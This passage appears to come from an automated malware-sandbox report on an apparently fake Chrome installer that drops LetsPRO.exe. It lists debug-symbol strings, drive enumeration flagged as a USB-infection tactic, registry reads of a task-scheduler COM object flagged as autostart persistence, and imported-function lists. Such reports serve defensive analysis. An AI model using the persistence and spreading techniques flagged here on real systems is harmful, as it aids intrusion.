Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\System32\netsh.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\cscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C950BF3
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 5_2_6C94CB0B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C9507B2
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 5_2_6C94C7E5
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C917CAD
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94FE26
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson, 5_2_6C94DFA9
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F945
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode, 5_2_6C94DAA8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F48B
